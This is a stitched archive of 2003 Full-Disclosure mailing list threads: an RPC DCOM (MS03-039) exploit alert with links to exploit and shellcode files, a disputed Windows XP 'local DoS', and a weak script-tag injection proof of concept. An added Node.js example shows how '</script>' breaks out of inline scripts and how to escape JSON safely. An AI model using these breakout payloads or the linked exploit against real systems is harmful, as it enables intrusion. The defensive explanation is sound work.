2. It was reported by the exploit author (and confirmed) that Windows XP SP1 with all security fixes installed is still vulnerable to a variant of the same bug. Windows 2000/2003 were not tested. For a while only a DoS exploit exists, but code execution is probably possible. Technical details have been sent to Microsoft, waiting for confirmation.
Dear ISPs, please instruct your customers to use the personal firewall in Windows XP.
-- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo-{ ^ }-+ \ | ZARAZA U 3APA3A } +-o66o--+ / |/ You know my name - look up my number (The Beatles)
Re: [Full-Disclosure] Local DoS in windows.
Steve Wray wrote: How long do you have to hold the mouse button down for? I see no effect after about 30 seconds, then I got bored... Tried in Outlook and WordPad. In fact the 'ambient' CPU usage actually appeared to flatten out. Seems to me that users of FD and bugtraq have just been social engineered into wasting a couple of man-hours 'testing' for this XP bug. Not quite Scaggs-worthy, granted, but it did manage to tie up Steve for half a minute. :) Cael
Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
Quoting Brown, Bobby (US - Hermitage) ([EMAIL PROTECTED]): For us that cannot interpret the site, what more information can be provided? Funny enough, it is a Russian translation of the original message you are replying to:

- Original Message - From: 3APA3A [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Friday, October 10, 2003 6:48 PM Subject: Bad news on RPC DCOM vulnerability
Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
Yeah, but the original poster 3APA3A withheld the actual exploit, which is available on that site.

- Original Message - From: Vladimir Parkhaev [EMAIL PROTECTED] Funny enough, it is a Russian translation of the original message you are replying to: - Original Message - From: 3APA3A [EMAIL PROTECTED] Sent: Friday, October 10, 2003 6:48 PM Subject: Bad news on RPC DCOM vulnerability
[Full-Disclosure] Local DoS in windows.
--- [Affected] ---
We have only tried it in Windows XP.
--- [Bug Details] ---
http://www.geocities.com/visitbipin/win_dos.jpg The image is self-explanatory...
--- [Description] ---
When you click any close, maximize or minimize button in Windows XP [no matter whether it's IE or WordPad], surprisingly there is 100% CPU use at that instant and it continues until you release the button! Moreover, we've noticed that if you continuously click the button for a long time [... not release it and hold ON] we've seen a gradual/slow rise in page-file use too...!!!
--- [Conclusion] ---
Hell... local DoS! That could be used by employees working at a different terminal. (O;
--- [Background Information] ---
This bug was originally discovered by hUNT3R [myself], a member of 01 Security Submission. The vendor was notified via email. http://www.ysgnet.com/hn
--- [I want a JOB/scholarship... anyone??? - hUNT3R] ---
[Full-Disclosure] [A bug! update...] Whom to blame, the HTML interpreter or the JavaScript compiler?
--- [Affected] ---
All versions of OPERA, MOZILLA and INTERNET EXPLORER available up to this release DATE!
--- [Proof of concept] ---
We have made a small script. Check it out, http://www.cyberdude.com.np/javascript.htm
--- [Bug Details] ---
<html>
<body>
<p>THIS IS hUNT3R aka: Bipin Gautam</p>
<script>alert("<script>location.href=http://www.ysgnet.com;</script>")</script>
</body>
</html>

<html>
<body>
<p>THIS IS hUNT3R aka:Bipin Gautam, exploit revised by Cyberdude</p>
<script>
document.write("<b>hUNTER Cyberdude</b></script><script>alert("it works 1"); alert("This works 2");
</script>
</body>
</html>
*
--- [Description] ---
The browser is letting you compile something inside the alert function. Well, it should show it anyway without compiling the script tag as it is inside the quotation. But surprisingly, the output is different! We found the JavaScript compiler choked when we use the script tag inside a function like alert(); this also proves to be true for the document.write(); function. This means that this script is going to choke badly and you won't get any output but just the ); that's all. This script is working. It's not that it is not working. It works in the starting script tag, but when the HTML parses the script tag inside the document.write it goes mad because nested scripting is not possible in HTML; the only nested tag in HTML must be the table tag, so in this script the HTML interpreter goes mad, but we can still insert the JavaScript in it. What we did was, we inserted the closing tag of JavaScript </script> first, closing the script tag that was opened already. After that we added the new starting script tag and wrote two alert tags now... So this is how we injected two alert tags in the JavaScript.
--- [Conclusion] ---
This proves injection of JavaScript inside a JavaScript, making it available to use the current variables and change some static values predefined and even access other functions without a problem. This was just a small demo; we use this simple script to just stop it from printing garbage on the screen.
--- [Background Information] ---
This bug was originally discovered by hUNT3R [myself], a member of 01 Security Submission. I would like to thank my friend 'Cyberdude' for further exploring it and taking it to a new level. http://www.ysgnet.com/hn
--- [I want a JOB/scholarship... anyone??? - hUNT3R] ---
Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage) wrote: For us that can not interpret the site, what more information can be provided. I believe if you use babelfish.altavista.com, you'll come to: http://forum.securitylab.ru/forum_posts.asp?TID=5642PN=0TPN=3 The code itself is:
Re: [Full-Disclosure] [A bug! update...] Whom to blame, the HTML interpreter or the JavaScript compiler?
The browser is letting you compile something inside the alert function. Well, it should show it anyway without compiling the script tag, as it is inside the quotation. But surprisingly, the output is different! This proves injection of JavaScript inside a JavaScript, making it available to use the current variable, change some predefined static values and even access other functions without a problem. THIS COULD BE USED IN MANY ATTACKS AND CAN BE A LOT OF PROBLEM TO THE WEBSITE where poor JS is used...

--- jelmer [EMAIL PROTECTED] wrote:

This is the code you sent:

  <html>
  <body>
  <p>THIS IS hUNT3R aka:Bipin Gautam, exploit revised by Cyberdude</p>
  <script>
  document.write("<b>hUNTER Cyberdude</b></script><script>alert("it works 1"); alert("This works 2"); </script>
  </body>
  </html>

This gives an "Unterminated string constant" error followed by 2 alerts, which is exactly what it should do.

1. <script>document.write("<b>hUNTER Cyberdude</b></script>
   This gives the unterminated string constant; you're simply not closing your string. <b>hUNTER Cyberdude</b> never gets written out.

2. <script>alert("it works 1"); alert("This works 2"); </script>
   This is perfectly valid and thus executes.

I really don't see what you're trying to do, or what the threat would be when you got whatever you're trying to do to work.

--jelmer

- Original Message -
From: bipin gautam [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Friday, October 10, 2003 7:16 PM
Subject: [Full-Disclosure] [A bug! update...] Whom to blame, the HTML interpreter or the JavaScript compiler?

--- [Affected] ---
All versions of OPERA, MOZILLA and INTERNET EXPLORER available up to this release DATE!

--- [Proof of concept] ---
We have made a small script. Check it out: http://www.cyberdude.com.np/javascript.htm

--- [Bug Details] ---

  <html>
  <body>
  <p>THIS IS hUNT3R aka: Bipin Gautam</p>
  <script>alert("<script>location.href='http://www.ysgnet.com';</script>")</script>
  </body>
  </html>

  <html>
  <body>
  <p>THIS IS hUNT3R aka:Bipin Gautam, exploit revised by Cyberdude</p>
  <script>
  document.write("<b>hUNTER Cyberdude</b></script><script>alert("it works 1"); alert("This works 2"); </script>
  </body>
  </html>

--- [Description] ---
The browser is letting you compile something inside the alert function. Well, it should show it anyway without compiling the script tag, as it is inside the quotation. But surprisingly, the output is different! We found the JavaScript compiler choked when we used the script tag inside a function like alert(); this also proves to be true for the document.write() function. This means that this script is going to choke badly and you won't get any output but just the "); that's all. This script is working. It's not that it is not working. It works in the starting script tag, but when the HTML parses the script tag inside the document.write it goes mad because nested scripting is not possible in HTML; the only nested tag in HTML must be the table tag, so in this script the HTML interpreter goes mad. But we can still insert the JavaScript in it. What we did was, we inserted the closing tag of JavaScript, </script>, first, closing the script tag that was opened already. After that we added the new starting script tag and wrote two alert tags... So this is how we injected two alert tags into the JavaScript.

--- [Conclusion] ---
This proves injection of JavaScript inside a JavaScript, making it available to use the current variable, change some predefined static values and even access other functions without a problem. This was just a small demo; we use this simple script just to stop it from printing garbage on the screen.

--- [Background Information] ---
This bug was originally discovered by hUNT3R [myself], a member of 01 Security Submission. I would like to thank my friend 'Cyberdude' for further exploring it and taking it to a new level. http://www.ysgnet.com/hn

---[I want a JOB/scholarship... anyone??? - hUNT3R]---

__ Do you Yahoo!? The New Yahoo! Shopping - with improved product search http://shopping.yahoo.com
___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
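The behaviour the thread argues about belongs to the HTML tokenizer, not to the JavaScript engine. While it is collecting the text of a <script> element the parser knows nothing about JavaScript string syntax: it ends the element at the first "</script" (case-insensitive) that is followed by whitespace, "/" or ">". That is why jelmer's browser reports an unterminated string for the first fragment and then happily runs the second one. The consequence that matters to anyone writing untrusted data into an inline script is that quoting or JSON-encoding the value is not enough; "<" (and, for the "<!--" case, also ">" and "&") has to be escaped at the JavaScript level, as \u003c and friends, so that "</script" can never appear in the served HTML. The Node.js example below is added here and is not code from the original posts or from any of the browsers discussed. splitScriptContent() is an assumed helper name and a simplification of the HTML "script data" tokenizer state (it ignores the "<!--" escape states); the quote characters in the reconstructed proof-of-concept string are assumed, since the list archive stripped them; hostileInput is constructed sample data.

```javascript
"use strict";

// Added example, not code from the original posts. Demonstrates why
// "</script>" inside a JavaScript string literal still ends the <script>
// element, and how to embed untrusted data in an inline script safely.

// Model of the HTML tokenizer's rule for script content: the element's text
// ends at the first "</script" (case-insensitive) followed by whitespace,
// "/" or ">". JavaScript quoting is invisible at this stage. This is a
// simplification of the HTML "script data" state, sufficient for the cases
// below (it ignores the "<!--" escape states).
function splitScriptContent(scriptText) {
  const endTag = /<\/script(?=[\s\/>])/i;
  const m = endTag.exec(scriptText);
  if (!m) {
    return { content: scriptText, rest: "" };
  }
  return { content: scriptText.slice(0, m.index), rest: scriptText.slice(m.index) };
}

// The first proof of concept from the thread (quote characters assumed; the
// list archive stripped them). This is what follows the <script> start tag:
const pocScriptText =
  "alert(\"<script>location.href='http://www.ysgnet.com';</script>\")</script>";

// Returns the JavaScript the engine actually receives for the PoC. It is cut
// off after the inner "</script>", hence "Unterminated string constant".
function pocScriptContent() {
  return splitScriptContent(pocScriptText).content;
}

// Naive server-side embedding: JSON.stringify escapes quotes and control
// characters but leaves "<" alone, so data containing "</script>" breaks out
// of the script element exactly like the PoC does.
function embedNaive(data) {
  return "<script>var d = " + JSON.stringify(data) + ";</script>";
}

// Hardened embedding: after JSON encoding, replace "<", ">", "&" and the
// U+2028/U+2029 line terminators with \uXXXX escapes. The result is still
// valid JSON and valid JavaScript, and the served HTML can no longer contain
// "</script" or "<!--" regardless of what the data holds.
function jsonForInlineScript(data) {
  return JSON.stringify(data).replace(/[<>&\u2028\u2029]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

function embedSafe(data) {
  return "<script>var d = " + jsonForInlineScript(data) + ";</script>";
}

// Check a page produced by embedNaive/embedSafe: the script element must run
// up to the end tag we wrote ourselves, and nothing may follow that tag.
function scriptStaysIntact(page) {
  const startTag = "<script>";
  if (!page.startsWith(startTag)) return false;
  const { content, rest } = splitScriptContent(page.slice(startTag.length));
  return rest === "</script>" && content.endsWith(";");
}

// Constructed sample input: a user-supplied name carrying a closing tag and a
// second script, in the spirit of the thread's "revised exploit".
const hostileInput = { name: "hUNT3R</script><script>alert(1)</script>" };

console.log("PoC script content seen by the JS engine:\n  " + pocScriptContent());
console.log("naive embedding intact: " + scriptStaysIntact(embedNaive(hostileInput)));
console.log("safe embedding intact:  " + scriptStaysIntact(embedSafe(hostileInput)));
console.log("safe embedding decodes: " +
  (JSON.parse(jsonForInlineScript(hostileInput)).name === hostileInput.name));
```

When reviewing templates, the thing to grep for is JSON written into a <script> block without this extra escaping step; the same breakout works for "</scRiPt >" and, through the escape states this model leaves out, for "<!--", which is why ">" and "&" are escaped as well rather than only "<".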
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
Not much info on the page, but here goes the juicy part.

Exploit: http://www.securitylab.ru/_exploits/rpc2.c.txt
Shellcode: http://www.securitylab.ru/_exploits/shell.asm.txt

Based on user responses, this is, in fact, a working exploit that will work on already patched systems. It's only a matter of time for a compiled binary to surface.

Dimitri

From: Brown, Bobby (US - Hermitage) [EMAIL PROTECTED]
Sent by: [EMAIL PROTECTED].netsys.com
Date: 10/10/2003 03:34 PM
To: 'Alex' [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED]
cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

For us that cannot interpret the site, what more information can be provided?

Bobby

-Original Message-
From: Alex [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 10, 2003 1:09 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

Exploit code can be found here: http://www.securitylab.ru/40754.html
This code works with all security fixes. It's very dangerous.

- Original Message -
From: 3APA3A [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Friday, October 10, 2003 6:48 PM
Subject: Bad news on RPC DCOM vulnerability

Dear [EMAIL PROTECTED],

There is some bad news on the RPC DCOM vulnerability:

1. A universal exploit for MS03-039 exists in the wild; PINK FLOYD is topical again.

2. It was reported by the exploit author (and confirmed) that Windows XP SP1 with all security fixes installed is still vulnerable to a variant of the same bug. Windows 2000/2003 was not tested. For now only a DoS exploit exists, but code execution is probably possible. Technical details have been sent to Microsoft; waiting for confirmation.

Dear ISPs, please instruct your customers to use the personal firewall in Windows XP.
--
http://www.security.nnov.ru
/\_/\ { , . } |\ +--oQQo-{ ^ }-+ \ | ZARAZA U 3APA3A } +-o66o--+ / |/
You know my name - look up my number (The Beatles)
___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Local DoS in windows.
Well... that works on mine! And on the computer that I have tested it on! ARE YOU USING WINDOWS XP PRO??? Well... in 2-3 sec, if you continuously click the button, HELL, IT WORKS! YOU AREN'T A MICROSOFT EMPLOYEE... ARE YOU???

--- Steve Wray [EMAIL PROTECTED] wrote:

How long do you have to hold the mouse button down for? I see no effect after about 30 seconds, then I got bored... Tried in Outlook and WordPad. In fact the 'ambient' CPU usage actually appeared to flatten out.

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of bipin gautam
Sent: Saturday, 11 October 2003 6:18 a.m.
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Local DoS in windows.

--- [Affected] ---
We have only tried it in Windows XP.

--- [Bug Details] ---
http://www.geocities.com/visitbipin/win_dos.jpg
The image is self-explanatory...

--- [Description] ---
When you click any close, maximize or minimize button in Windows XP [no matter whether it's IE or WordPad], surprisingly there is 100% CPU use at that instant, and it continues until you release the button! Moreover, we've noticed that if you continuously click the button for a long time [... not release it and hold ON], there is a gradual/slow rise in page-file use too...!!!

--- [Conclusion] ---
Hell... local DoS! That could be used by employees working at different terminals. (O;

--- [Background Information] ---
This bug was originally discovered by hUNT3R [myself], a member of 01 Security Submission. The vendor was notified via email. http://www.ysgnet.com/hn

___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
__ Do you Yahoo!? The New Yahoo! Shopping - with improved product search http://shopping.yahoo.com
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

*Gasp!* You've never seen Babel Fish translate a webpage?

http://babelfish.altavista.com/

And select "Translate a Web Page"... Presto! It's rough, but gets you close enough.

Regards,
- -Matt.

- --
Matthew D. Lammers, CISSP
Columbus, Ohio, US

- -----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Brown, Bobby (US - Hermitage)
Sent: Friday, October 10, 2003 3:34 PM
To: 'Alex'; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

For us that cannot interpret the site, what more information can be provided?

Bobby

- -----Original Message-----
From: Alex [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 10, 2003 1:09 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

Exploit code can be found here: http://www.securitylab.ru/40754.html

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQA/AwUBP4cgtwcf69dS5KepEQL5xQCeJjvocPI8r/qPCYCP61MvbGuxxWgAoJie
I6zE7ut38aXb1SpOaIK8vY91
=dNPg
-----END PGP SIGNATURE-----
___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html